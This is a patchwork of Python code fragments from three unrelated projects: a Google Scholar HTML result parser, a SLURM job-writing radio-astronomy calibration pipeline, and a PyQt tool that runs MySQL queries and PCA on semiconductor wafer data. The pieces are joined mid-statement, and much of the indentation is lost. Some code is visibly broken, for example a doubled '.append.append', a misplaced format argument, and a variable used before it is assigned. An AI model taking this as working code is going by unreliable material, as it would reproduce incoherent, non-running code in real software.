    Google made some time before the 07/26/12 layout handled below.
    """
    def _parse_article(self, div):
        # Build a fresh article and fill it from the result <div>'s children.
        self.article = ScholarArticle()

        for tag in div:
            if not hasattr(tag, 'name'):
                continue

            # Title and main link live in <h3 class="gs_rt"><a ...>.
            if tag.name == 'h3' and self._tag_has_class(tag, 'gs_rt') and tag.a:
                self.article['title'] = ''.join(tag.a.findAll(text=True))
                self.article['url'] = self._path2url(tag.a['href'])
                if self.article['url'].endswith('.pdf'):
                    self.article['url_pdf'] = self.article['url']

            # The 'gs_a' byline div carries authors/venue/year; grab the year.
            if tag.name == 'div' and self._tag_has_class(tag, 'gs_a'):
                year = self.year_re.findall(tag.text)
                self.article['year'] = year[0] if len(year) > 0 else None

            # The 'gs_fl' footer div holds citation/versions links.
            if tag.name == 'div' and self._tag_has_class(tag, 'gs_fl'):
                self._parse_links(tag)
class ScholarArticleParser120726(ScholarArticleParser):
    """
    This class reflects update to the Scholar results page layout that
    Google made 07/26/12.
    """
    def _parse_article(self, div):
        """Populate self.article from one result <div> (07/26/12 layout)."""
        self.article = ScholarArticle()

        for tag in div:
            if not hasattr(tag, 'name'):
                continue

            # BUG FIX: the original tested 'str(tag).lower().find(".pdf")',
            # which is truthy for every position except 0 -- including -1
            # when '.pdf' is absent. Use a real substring test instead.
            if '.pdf' in str(tag).lower():
                if tag.find('div', {'class': 'gs_ttss'}):
                    self._parse_links(tag.find('div', {'class': 'gs_ttss'}))

            if tag.name == 'div' and self._tag_has_class(tag, 'gs_ri'):
                # There are (at least) two formats here. In the first
                # one, we have a link, e.g.:
                #
                # <h3 class="gs_rt">
                #   <a href="http://..." class="yC0">
                #     <b>Honeycomb</b>: creating intrusion detection signatures ...
                #   </a>
                # </h3>
                #
                # In the other, there's no actual link -- it's what
                # Scholar renders as "CITATION" in the HTML:
                #
                # <h3 class="gs_rt">
                #   <span class="gs_ctu">
                #     <span class="gs_ct1">[CITATION]</span>
                #     <span class="gs_ct2">[C]</span>
                #   </span>
                #   <b>Honeycomb</b> automated ids signature creation using honeypots
                # </h3>
                #
                # We now distinguish the two.
                try:
                    atag = tag.h3.a
                    self.article['title'] = ''.join(atag.findAll(text=True))
                    self.article['url'] = self._path2url(atag['href'])
                    if self.article['url'].endswith('.pdf'):
                        self.article['url_pdf'] = self.article['url']
                except Exception:
                    # No direct link (the [CITATION] case). The bare
                    # 'except:' was narrowed to Exception so that
                    # KeyboardInterrupt/SystemExit are not swallowed.
                    # Remove a few spans that have unneeded content (e.g. [CITATION])
                    for span in tag.h3.findAll(name='span'):
                        span.clear()
                    self.article['title'] = ''.join(tag.h3.findAll(text=True))

                if tag.find('div', {'class': 'gs_a'}):
                    year = self.year_re.findall(tag.find('div', {'class': 'gs_a'}).text)
                    self.article['year'] = year[0] if len(year) > 0 else None

                if tag.find('div', {'class': 'gs_fl'}):
                    self._parse_links(tag.find('div', {'class': 'gs_fl'}))

                if tag.find('div', {'class': 'gs_rs'}):
                    # These are the content excerpts rendered into the results.
                    raw_text = tag.find('div', {'class': 'gs_rs'}).findAll(text=True)
                    if len(raw_text) > 0:
                        raw_text = ''.join(raw_text)
                        raw_text = raw_text.replace('\n', '')
                        self.article['excerpt'] = raw_text
class ScholarQuery(object):
"""
The base class for any kind of results query we send to Scholar.
"""
    def __init__(self):
        # Fully-built query URL; populated by subclasses.
        self.url = None

        # The number of results requested from Scholar -- not the
        # total number of results it reports (the latter gets stored
        # in attrs, see below).
        self.num_results = None

        # Queries may have global result attributes, similar to
        # per-article attributes in ScholarArticle. The exact set of
        # attributes may differ by query type, but they all share the
        # basic data structure:
        self.attrs = {}
    def set_num_page_results(self, num_page_results):
        # Validate and store the per-page result limit; ScholarUtils raises
        # with the given message when the value is not numeric.
        self.num_results = ScholarUtils.ensure_int(
            num_page_results,
            'maximum number of results on page must be numeric')
def get_url(self):
"""
Returns a complete, submittable URL string for this particular
query | |
i,script in enumerate(scripts):
jobname = os.path.splitext(os.path.split(script)[1])[0]
#Use input SLURM configuration for threadsafe tasks, otherwise call srun with single node and single thread
if threadsafe[i]:
write_sbatch(script,'--config {0}'.format(TMP_CONFIG),nodes=nodes,tasks=ntasks_per_node,mem=mem,plane=plane,exclude=exclude,mpi_wrapper=mpi_wrapper,
container=containers[i],partition=partition,time=time,name=jobname,runname=name,SPWs=crosscal_kwargs['spw'],nspw=crosscal_kwargs['nspw'],account=account,reservation=reservation,justrun=justrun)
else:
write_sbatch(script,'--config {0}'.format(TMP_CONFIG),nodes=1,tasks=1,mem=mem,plane=1,mpi_wrapper='srun',container=containers[i],
partition=partition,time=time,name=jobname,runname=name,SPWs=crosscal_kwargs['spw'],nspw=crosscal_kwargs['nspw'],exclude=exclude,account=account,reservation=reservation,justrun=justrun)
#Replace all .py with .sbatch
scripts = [os.path.split(scripts[i])[1].replace('.py','.sbatch') for i in range(len(scripts))]
precal_scripts = scripts[:num_precal_scripts]
postcal_scripts = scripts[num_precal_scripts:]
echo = False if quiet else True
if crosscal_kwargs['nspw'] > 1:
#Build master master script, calling each of the separate SPWs at once, precal scripts before this, and postcal scripts after this
write_spw_master(MASTER_SCRIPT,config,SPWs=crosscal_kwargs['spw'],precal_scripts=precal_scripts,postcal_scripts=postcal_scripts,submit=submit,pad_length=pad_length,dependencies=dependencies,timestamp=timestamp,slurm_kwargs=kwargs)
else:
#Build master pipeline submission script
write_master(MASTER_SCRIPT,config,scripts=scripts,submit=submit,pad_length=pad_length,verbose=verbose,echo=echo,dependencies=dependencies,slurm_kwargs=kwargs)
def default_config(arg_dict):
    """Generate default config file in current directory, pointing to MS, with fields and SLURM parameters set.

    Arguments:
    ----------
    arg_dict : dict
        Dictionary of arguments passed into this script, which is inserted into the config file under various sections."""

    filename = arg_dict['config']
    MS = arg_dict['MS']

    #Copy default config to current location
    copyfile('{0}/{1}'.format(SCRIPT_DIR,CONFIG),filename)

    #Add SLURM CL arguments to config file under section [slurm]
    slurm_dict = get_slurm_dict(arg_dict,SLURM_CONFIG_KEYS)
    # String-valued options must be quoted before being written to the config.
    for key in SLURM_CONFIG_STR_KEYS:
        if key in slurm_dict.keys(): slurm_dict[key] = "'{0}'".format(slurm_dict[key])

    #Overwrite CL parameters in config under section [slurm]
    config_parser.overwrite_config(filename, conf_dict=slurm_dict, conf_sec='slurm')

    #Add MS to config file under section [data] and dopol under section [run]
    config_parser.overwrite_config(filename, conf_dict={'vis' : "'{0}'".format(MS)}, conf_sec='data')
    config_parser.overwrite_config(filename, conf_dict={'dopol' : arg_dict['dopol']}, conf_sec='run', sec_comment='# Internal variables for pipeline execution')

    # Drop the selfcal / science-image sections (and their scripts) when the
    # corresponding stages are disabled.
    if not arg_dict['do2GC'] or not arg_dict['science_image']:
        remove_scripts = []
        if not arg_dict['do2GC']:
            config_parser.remove_section(filename, 'selfcal')
            remove_scripts = ['selfcal_part1.py', 'selfcal_part2.py']
        if not arg_dict['science_image']:
            config_parser.remove_section(filename, 'image')
            remove_scripts += ['science_image.py']
        scripts = arg_dict['postcal_scripts']
        # Remove matching scripts in place; the index is stepped back after a
        # pop so the element that slid into position i is not skipped.
        i = 0
        while i < len(scripts):
            if scripts[i][0] in remove_scripts:
                scripts.pop(i)
                i -= 1
            i += 1
        config_parser.overwrite_config(filename, conf_dict={'postcal_scripts' : scripts}, conf_sec='slurm')

    if not arg_dict['nofields']:
        #Don't call srun if option --local used
        if arg_dict['local']:
            mpi_wrapper = ''
        else:
            mpi_wrapper = srun(arg_dict)

        #Write and submit srun command to extract fields, and insert them into config file under section [fields]
        params = '-B -M {MS} -C {config} -N {nodes} -t {ntasks_per_node}'.format(**arg_dict)
        if arg_dict['dopol']:
            params += ' -P'
        if arg_dict['verbose']:
            params += ' -v'
        command = write_command('read_ms.py', params, mpi_wrapper=mpi_wrapper, container=arg_dict['container'],logfile=False)
        logger.info('Extracting field IDs from MeasurementSet "{0}" using CASA.'.format(MS))
        logger.debug('Using the following command:\n\t{0}'.format(command))
        os.system(command)
    else:
        #Skip extraction of field IDs and assume we're not processing multiple SPWs
        logger.info('Skipping extraction of field IDs and assuming nspw=1.')
        config_parser.overwrite_config(filename, conf_dict={'nspw' : 1}, conf_sec='crosscal')

    #If dopol=True, replace second call of xx_yy_* scripts with xy_yx_* scripts
    #Check in config (not CL args), in case read_ms.py forces dopol=False, and assume we only want to set this for 'scripts'
    dopol = config_parser.get_key(filename, 'run', 'dopol')
    if dopol:
        count = 0
        for ind, ss in enumerate(arg_dict['scripts']):
            if ss[0] == 'xx_yy_solve.py' or ss[0] == 'xx_yy_apply.py':
                count += 1
            # From the third solve/apply occurrence on, switch to the
            # cross-hand (xy_yx) variants, keeping threadsafe/container.
            if count > 2:
                if ss[0] == 'xx_yy_solve.py':
                    arg_dict['scripts'][ind] = ('xy_yx_solve.py',arg_dict['scripts'][ind][1],arg_dict['scripts'][ind][2])
                if ss[0] == 'xx_yy_apply.py':
                    arg_dict['scripts'][ind] = ('xy_yx_apply.py',arg_dict['scripts'][ind][1],arg_dict['scripts'][ind][2])
        config_parser.overwrite_config(filename, conf_dict={'scripts' : arg_dict['scripts']}, conf_sec='slurm')

    logger.info('Config "{0}" generated.'.format(filename))
def get_slurm_dict(arg_dict, slurm_config_keys):
    """Build a slurm dictionary to be inserted into config file, using specified keys.

    Arguments:
    ----------
    arg_dict : dict
        Dictionary of arguments passed into this script, which is inserted into the config file under section [slurm].
    slurm_config_keys : list
        List of keys from arg_dict to insert into config file.

    Returns:
    --------
    slurm_dict : dict
        Dictionary to insert into config file under section [slurm]."""

    # Project arg_dict down to the requested keys (missing keys raise, as
    # in the original loop-free comprehension this replaces).
    return {key: arg_dict[key] for key in slurm_config_keys}
def pop_script(kwargs, script):
    """Pop script from list of scripts, list of threadsafe tasks, and list of containers.

    Arguments:
    ----------
    kwargs : dict
        Keyword arguments extracted from [slurm] section of config file, to be passed into write_jobs() function.
    script : str
        Name of script.

    Returns:
    --------
    popped : bool
        Was the script popped?"""

    if script not in kwargs['scripts']:
        return False
    # The three lists are parallel; drop the same index from each.
    index = kwargs['scripts'].index(script)
    for key in ('scripts', 'threadsafe', 'containers'):
        kwargs[key].pop(index)
    return True
def format_args(config,submit,quiet,dependencies,justrun):
"""Format (and validate) arguments from config file, to be passed into write_jobs() function.
Arguments:
----------
config : str
Path to config file.
submit : bool
Allow user to force submitting to queue immediately.
quiet : bool
Activate quiet mode, with suppressed output?
dependencies : str
Comma-separated list of SLURM job dependencies.
justrun : bool
Just run the pipeline without rebuilding each job script (if it exists).
Returns:
--------
kwargs : dict
Keyword arguments extracted from [slurm] section of config file, to be passed into write_jobs() function."""
#Ensure all keys exist in these sections
kwargs = get_config_kwargs(config,'slurm',SLURM_CONFIG_KEYS)
data_kwargs = get_config_kwargs(config,'data',['vis'])
get_config_kwargs(config, 'fields', FIELDS_CONFIG_KEYS)
crosscal_kwargs = get_config_kwargs(config, 'crosscal', CROSSCAL_CONFIG_KEYS)
#Check selfcal params
if config_parser.has_section(config,'selfcal'):
selfcal_kwargs = get_config_kwargs(config, 'selfcal', SELFCAL_CONFIG_KEYS)
params = bookkeeping.get_selfcal_params()
if selfcal_kwargs['loop'] > 0:
logger.warning("Starting with loop={0}, which is only valid if previous loops were successfully run in this directory.".format(selfcal_kwargs['loop']))
#Find RACS outliers
elif ((nspw > 1 and 'selfcal_part1.py' in [i[0] for i in kwargs['postcal_scripts']]) or (nspw == 1 and 'selfcal_part1.py' in [i[0] for i in kwargs['scripts']])) and selfcal_kwargs['outlier_threshold'] != 0 and selfcal_kwargs['outlier_threshold'] != '':
logger.info('Populating sky model for selfcal using outlier_threshold={0}'.format(selfcal_kwargs['outlier_threshold']))
logger.info('Querying Rapid ASAKP Continuum Survey (RACS) catalog within 2 degrees of target phase centre. Please allow a moment for this.')
sky_model_kwargs = deepcopy(kwargs)
sky_model_kwargs['partition'] = 'Devel'
mpi_wrapper = srun(sky_model_kwargs, qos=True, time=2, mem=0)
command = write_command('set_sky_model.py', '-C {0}'.format(config), mpi_wrapper=mpi_wrapper, container=kwargs['container'],logfile=False)
logger.debug('Running following command:\n\t{0}'.format(command))
os.system(command)
if config_parser.has_section(config,'image'):
imaging_kwargs = get_config_kwargs(config, 'image', IMAGING_CONFIG_KEYS)
if config_parser.has_section(config,'image'):
imaging_kwargs = get_config_kwargs(config, 'image', IMAGING_CONFIG_KEYS)
#Force submit=True if user has requested it during [-R --run]
if submit:
kwargs['submit'] = True
#Ensure nspw is integer
if type(crosscal_kwargs['nspw']) is not int:
logger.warning("Argument 'nspw'={0} in '{1}' is not an integer. Will set to integer ({2}).".format(crosscal_kwargs['nspw']),config,int(crosscal_kwargs['nspw']))
crosscal_kwargs['nspw'] = int(crosscal_kwargs['nspw'])
spw = crosscal_kwargs['spw']
nspw = crosscal_kwargs['nspw']
mem = int(kwargs['mem'])
if nspw > 1 and len(kwargs['scripts']) == 0:
logger.warning('Setting nspw=1, since no "scripts" parameter in "{0}" is empty, so there\'s nothing run inside SPW directories.'.format(config))
config_parser.overwrite_config(config, conf_dict={'nspw' : 1}, conf_sec='crosscal')
nspw = 1
#If nspw = 1 and precal or postcal scripts present, overwrite config and reload
if nspw == 1:
if len(kwargs['precal_scripts']) > 0 or len(kwargs['postcal_scripts']) > 0:
logger.warning('Appending "precal_scripts" to beginning of "scripts", and "postcal_scripts" to end of "scripts", since nspw=1. Overwritting this in "{0}".'.format(config))
#Drop first instance of calc_refant.py from precal scripts in preference for one in scripts (after flag_round_1.py)
if 'calc_refant.py' in [i[0] for i in kwargs['precal_scripts']] and 'calc_refant.py' in [i[0] for i in kwargs['scripts']]:
kwargs['precal_scripts'].pop([i[0] for i in kwargs['precal_scripts']].index('calc_refant.py'))
scripts = kwargs['precal_scripts'] + kwargs['scripts'] + kwargs['postcal_scripts']
config_parser.overwrite_config(config, conf_dict={'scripts' : scripts}, conf_sec='slurm')
config_parser.overwrite_config(config, conf_dict={'precal_scripts' : []}, conf_sec='slurm')
config_parser.overwrite_config(config, conf_dict={'postcal_scripts' : []}, conf_sec='slurm')
kwargs = get_config_kwargs(config,'slurm',SLURM_CONFIG_KEYS)
else:
scripts = kwargs['scripts']
else:
scripts = kwargs['precal_scripts'] + kwargs['postcal_scripts']
kwargs['num_precal_scripts'] = len(kwargs['precal_scripts'])
# Validate kwargs along with MS
kwargs['MS'] = data_kwargs['vis']
validate_args(kwargs,config)
#Reformat scripts tuple/list, to extract scripts, threadsafe, and containers as parallel lists
#Check that path to each script and container exists or is ''
kwargs['scripts'] = [check_path(i[0]) for i in scripts]
kwargs['threadsafe'] = [i[1] for i in scripts]
kwargs['containers'] = [check_path(i[2]) for i in scripts]
if not crosscal_kwargs['createmms']:
logger.info("You've set 'createmms = False' in '{0}', so forcing 'keepmms = False'. Will use single CPU for every job other than 'partition.py', 'quick_tclean.py' and 'selfcal_*.py', if present.".format(config))
config_parser.overwrite_config(config, conf_dict={'keepmms' : False}, conf_sec='crosscal')
kwargs['threadsafe'] = [False]*len(scripts)
elif not crosscal_kwargs['keepmms']:
#Set threadsafe=False for split and postcal scripts (since working with MS not MMS).
if 'split.py' in kwargs['scripts']:
kwargs['threadsafe'][kwargs['scripts'].index('split.py')] = False
if nspw != 1:
kwargs['threadsafe'][kwargs['num_precal_scripts']:] = [False]*len(kwargs['postcal_scripts'])
#Set threadsafe=True for quick-tclean, selfcal_part1 or science_image as tclean uses MPI even for an MS (TODO: ensure it doesn't crash for flagging step)
for threadsafe_script in ['quick_tclean.py','selfcal_part1.py','science_image.py']:
if threadsafe_script in kwargs['scripts']:
kwargs['threadsafe'][kwargs['scripts'].index(threadsafe_script)] = True
#Only reduce the memory footprint if we're not using all CPUs on each node
if kwargs['ntasks_per_node'] < NTASKS_PER_NODE_LIMIT and nspw > 1:
mem = int(mem // (nspw/2))
dopol = config_parser.get_key(config, 'run', 'dopol')
if not dopol and ('xy_yx_solve.py' in kwargs['scripts'] or 'xy_yx_apply.py' in kwargs['scripts']):
logger.warning("Cross-hand calibration scripts 'xy_yx_*' found in scripts. Forcing dopol=True in '[run]' section of '{0}'.".format(config))
config_parser.overwrite_config(config, conf_dict={'dopol' : True}, conf_sec='run', sec_comment='# Internal variables for pipeline execution')
includes_partition = any('partition' in script for script in kwargs['scripts'])
#If single correctly formatted spw, split into nspw directories, and process each spw independently
if nspw > 1:
#Write | |
on data/information received
# function(self, Data):
# GetData = Data
system_log = pyqtSignal(str)
progress = pyqtSignal(str)
query_result = pyqtSignal(object)
query_result2 = pyqtSignal(object)
def __init__(self, query_cat, query_input1, query_input2, parent = None):
super(QueryThread, self).__init__(parent)
self.query_cat = query_cat
self.query_input1 = query_input1
self.query_input2 = query_input2
    def __enter__(self):
        # Support `with QueryThread(...) as t:` usage; yields the thread itself.
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        # Ask the QThread event loop to stop when the context exits.
        self.quit()
def run(self):
with MySQL_Query(self.query_input1, self.query_input2 , self.system_log, self.progress) as mysqlquery:
if self.query_cat == 'None' and self.query_input1 == 'None':
query_tech = mysqlquery.query_tech()
self.query_result.emit(query_tech)
elif self.query_cat == 'Process_Tech_Category':
query_process_tech_category = mysqlquery.query_process_tech_category()
self.query_result.emit(query_process_tech_category)
elif self.query_cat == 'Product':
query_product = mysqlquery.query_product()
self.query_result.emit(query_product)
elif self.query_cat == 'Test':
query_test = mysqlquery.query_test()
self.query_result.emit(query_test)
elif self.query_cat == 'Lot':
query_lot = mysqlquery.query_lot()
self.query_result.emit(query_lot)
elif self.query_cat == 'Bin':
query_bin = mysqlquery.query_bin()
self.query_result.emit(query_bin)
elif self.query_cat == 'Lot Bin':
query_lot = mysqlquery.query_lot()
self.query_result.emit(query_lot)
query_bin = mysqlquery.query_bin()
self.query_result2.emit(query_bin)
elif self.query_cat == 'Filter Bin':
query_filterbin = mysqlquery.query_filterbin()
self.query_result.emit(query_filterbin)
elif self.query_cat == 'Time':
query_lot_time = mysqlquery.query_lot_time()
self.query_result.emit(query_lot_time)
elif self.query_cat == 'Step':
query_step = mysqlquery.query_step()
self.query_result.emit(query_step)
elif self.query_cat == 'Filter Inline Step':
query_step = mysqlquery.query_filterinlinestep()
self.query_result.emit(query_step)
elif self.query_cat == 'Filter Inline Step Name':
query_step_name = mysqlquery.query_filterinlinestepname()
self.query_result.emit(query_step_name)
elif self.query_cat == 'Filter Wip Step':
query_step = mysqlquery.query_filterwipstep()
self.query_result.emit(query_step)
elif self.query_cat == 'Filter Wip Step Name':
query_step_name = mysqlquery.query_filterwipstepname()
self.query_result.emit(query_step_name)
elif self.query_cat == 'Tool':
query_tool = mysqlquery.query_tool()
self.query_result.emit(query_tool)
elif self.query_cat == 'ET':
query_et = mysqlquery.query_ET()
self.query_result2.emit(query_et)
elif self.query_cat == 'Filter ET':
query_et = mysqlquery.query_filterET()
self.query_result2.emit(query_et)
elif self.query_cat == 'Query':
query_data = mysqlquery.query_data()
self.query_result.emit(query_data)
else:
self.system_log.emit("Error! Unable to retrieve data from MySQL Database")
class Thread(QThread):
    # MultiThreading class for PCA.
    # Stages of the analysis:
    # 1) Querying ET data for analysis
    # 2) Data Preparation (Uncompressing ET data into dataframe/array)
    # 3) Data Cleaning (Removing Outliers)
    # 4) PCA
    # 5) Emit data for data visualisation and Exporting (Excel)
    progress = pyqtSignal(float)               # percentage progress of long loops
    system_log = pyqtSignal(str)               # status / error messages for the UI log
    data = pyqtSignal(object)                  # [combined dataframe, biplot dataframe]
    eigenpairs = pyqtSignal(object)
    principal_components = pyqtSignal(object)  # PCA components, rounded to 3 d.p.
    PC_barplot = pyqtSignal(object)
    screeplot = pyqtSignal(object)
    biplot = pyqtSignal(object)
    completed = pyqtSignal(str)
def __init__(self, Input, parent = None):
super(Thread, self).__init__(parent)
self.oldstdout = sys.stdout
self.oldstderr = sys.stderr
self.DataSource = Input[0]
self.Product_No = Input[1]
self.Lot_No = Input[2]
self.Test_Type = Input[3]
self.Bin = Input[4]
self.Class = Input[5]
self.Class_Type = Input[6]
self.StepTool = Input[7]
    def __enter__(self):
        # Support `with Thread(...) as t:` usage; yields the thread itself.
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        # Ask the QThread event loop to stop when the context exits.
        self.quit()
def run(self):
start = time.time()
if self.DataSource[0] == 'Import':
merged_data = []
merged_data_key = []
Scribe = []
ImportedSheets = self.DataSource[1][0]
ImportedSheets_name = self.DataSource[1][1]
ImportData_headers_selected = self.DataSource[1][2]
self.system_log.emit('Organizing data..')
for i in range(len(ImportedSheets_name)):
if len(ImportData_headers_selected[ImportedSheets_name[i]]) >= 1:
Data = ImportedSheets[ImportedSheets_name[i]][ImportData_headers_selected[ImportedSheets_name[i]]]
ImportData_Header_list = []
ImportData_Header_Change_list = []
ImportData_Merge_key = []
for j in range(len(ImportData_headers_selected[ImportedSheets_name[i]])):
if 'LOT' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Lot_No')
ImportData_Merge_key.append('Lot_No')
elif 'Lot' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Lot_No')
ImportData_Merge_key.append('Lot_No')
else:
pass
if 'Wafer_Alias' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Wafer_Alias')
ImportData_Merge_key.append('Wafer_Alias')
elif 'WAFER' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
if 'LOT' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
for n in range(len(Data)):
if len(Data['WAFER'][n]) == 1:
Data['Wafer_Alias'] = Data['LOT'][n].split('.')[0] + '.' + '0' + Data['WAFER'][n]
else:
Data['Wafer_Alias'] = Data['LOT'][n].split('.')[0] + Data['WAFER'][n]
ImportData_Merge_key.append.append('Wafer_Alias')
elif 'Lot_No' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
for n in range(len(Data)):
if len(Data['WAFER'][n]) == 1:
Data['Wafer_Alias'] = Data['Lot_No'][n].split('.')[0] + '.' + '0' + Data['WAFER'][n]
else:
Data['Wafer_Alias'] = Data['Lot_No'][n].split('.')[0] + Data['WAFER'][n]
ImportData_Merge_key.append.append('Wafer_Alias')
else:
pass
Data.drop(['WAFER'], axis=1, inplace = True)
else:
pass
if 'SCRIBE' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Scribe')
ImportData_Merge_key.append('Scribe')
for n in range(len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique())):
Scribe.append(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()[n])
self.progress.emit(np.round((n/len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()))*100, decimals = 2))
elif 'SUBSTRATE' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Scribe')
ImportData_Merge_key.append('Scribe')
for n in range(len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique())):
Scribe.append(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()[n])
self.progress.emit(np.round((n/len(Data[ImportData_headers_selected[ImportedSheets_name[i]][j]].unique()))*100, decimals = 2))
else:
self.system_log.emit("Error! Please select Data Column consist of Wafer Scribe")
return
if 'PRODUCT' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Product')
ImportData_Merge_key.append('Product')
if 'TIME' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Measure')
if 'Yield' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Yield')
if self.Class_Type == 'Yield':
wafer_classification = []
for n in range(len(Data)):
if Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] < self.Class[0]:
wafer_classification.append('Bad')
elif Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] >= self.Class[0] and Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] <= self.Class[1]:
wafer_classification.append('Mild')
else:
wafer_classification.append('Good')
Data['Classification'] = wafer_classification
elif 'YIELD' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Yield')
if self.Class_Type == 'Yield':
wafer_classification = []
for n in range(len(Data)):
if Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] < self.Class[0]:
wafer_classification.append('Bad')
elif Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] >= self.Class[0] and Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] <= self.Class[1]:
wafer_classification.append('Mild')
else:
wafer_classification.append('Good')
Data['Classification'] = wafer_classification
elif 'sort' in ImportData_headers_selected[ImportedSheets_name[i]][j]:
ImportData_Header_list.append(ImportData_headers_selected[ImportedSheets_name[i]][j])
ImportData_Header_Change_list.append('Yield')
if self.Class_Type == 'Yield':
wafer_classification = []
for n in range(len(Data)):
if Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] < self.Class[0]:
wafer_classification.append('Bad')
elif Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] >= self.Class[0] and Data[ImportData_headers_selected[ImportedSheets_name[i]][j]][n] <= self.Class[1]:
wafer_classification.append('Mild')
else:
wafer_classification.append('Good')
Data['Classification'] = wafer_classification
else:
self.system_log.emit("Error! Please select Data Column consist of Wafer Yield")
return
Data.rename(columns={ImportData_Header_list[n]:ImportData_Header_Change_list[n] for n in range(len(ImportData_Header_list))}, inplace=True)
merged_data_key.append(ImportData_Merge_key)
merged_data.append(Data)
self.progress.emit(0)
with MySQL_Query(tuple(Scribe), 'None', self.system_log, self.progress) as mysqlquery:
df_et_wmap_raw = mysqlquery.df_et_wmap_raw_import() #dataframe
if len(df_et_wmap_raw[0].index) == 0 or len(df_et_wmap_raw[1]) == 0:
self.system_log.emit("Error! No data found in MySQL database")
return
prepared_data = self.data_preparation(df_et_wmap_raw)
df_combined_data = prepared_data
info_header = []
data_header = []
for n in range(len(merged_data)):
df_combined_data = pd.merge(df_combined_data, merged_data[n], how = 'left', on = merged_data_key[n])
if self.Class_Type == 'Yield':
df_combined_data[['Classification','Yield']].replace('', np.nan, inplace=True)
df_combined_data.dropna(subset=['Classification','Yield'], inplace=True)
df_combined_data.reset_index(drop = True, inplace = True)
else:
self.system_log.emit("Error! Please ensure that the 'Yield' CheckBox is Checked under Classification")
return
df_combined_data.dropna(axis=1, how='all', inplace=True)
for n in range(len(df_combined_data.columns)):
if type(df_combined_data.iloc[0,n]) == str:
info_header.append(df_combined_data.columns[n])
else:
data_header.append(df_combined_data.columns[n])
info_header.append('Measure')
info_header.append('Yield')
data_header.remove('Measure')
data_header.remove('Yield')
cleaned_data = self.data_cleaning([df_combined_data, data_header])
df_combined_data = cleaned_data[1][info_header + data_header]
PCA = self.PCA([cleaned_data[0], cleaned_data[1], info_header, data_header])
elif self.DataSource[0] == 'MySQL':
with MySQL_Query([self.Product_No,
self.Lot_No,
self.Test_Type, self.Bin, self.Class], 'None', self.system_log, self.progress) as mysqlquery:
df_et_wmap_raw = mysqlquery.df_et_wmap_raw() #dataframe
if len(df_et_wmap_raw[0].index) == 0 or len(df_et_wmap_raw[1]) == 0:
self.system_log.emit("Error! No data found in MySQL database")
return
if self.Class_Type == 'Bin':
df_wafer_class = mysqlquery.wafer_bin()
if self.Class_Type == 'Yield':
df_wafer_class = mysqlquery.wafer_yield()
for count in (df_wafer_class['Classification'].value_counts()).tolist():
if count < 2:
self.system_log.emit('Error! The classfication criteria defined could not differentiate the selected data')
return
prepared_data = self.data_preparation(df_et_wmap_raw)
info_header = ['Product','Lot_No','Wafer_Alias','Scribe']
data_header = prepared_data.columns[4:].tolist()
et_cleaned_data = self.data_cleaning([prepared_data, data_header])
df_combined_data = pd.merge(df_wafer_class, et_cleaned_data[1] , how='left', on = info_header)
PCA = self.PCA([et_cleaned_data[0], et_cleaned_data[1], info_header, data_header])
else:
self.system_log.emit('Error! Unable to locate Data Source')
return
self.system_log.emit('Performing Data Visualization..')
if len(PCA[1].columns) >= 10:
NumberOfPC = 11
else:
NumberOfPC = len(PCA[1].columns)
if self.DataSource[0] == 'Import':
df_biplot = PCA[2][info_header]
for l in range(1,NumberOfPC):
projected_data = list(PCA[2][f"PC{l}"])
scale_projected_data = 1.0/(max(projected_data) - min(projected_data))
scaled_projected_data = list(i*scale_projected_data for i in projected_data)
df_biplot[f"PC{l}"] = scaled_projected_data
elif self.DataSource[0] == 'MySQL':
df_biplot = PCA[2][info_header]
for l in range(1,NumberOfPC):
projected_data = list(PCA[2][f"PC{l}"])
scale_projected_data = 1.0/(max(projected_data) - min(projected_data))
scaled_projected_data = list(i*scale_projected_data for i in projected_data)
df_biplot[f"PC{l}"] = scaled_projected_data
if type(self.StepTool) == str:
df_biplot = pd.merge(df_wafer_class, df_biplot, how = "left", on = info_header)
df_biplot.drop_duplicates(subset=['Wafer_Alias','Scribe'], inplace = True)
df_biplot.reset_index(drop = True, inplace = True)
df_biplot[['Classification']].replace('', np.nan, inplace=True)
df_biplot.dropna(subset=['Classification'], inplace=True)
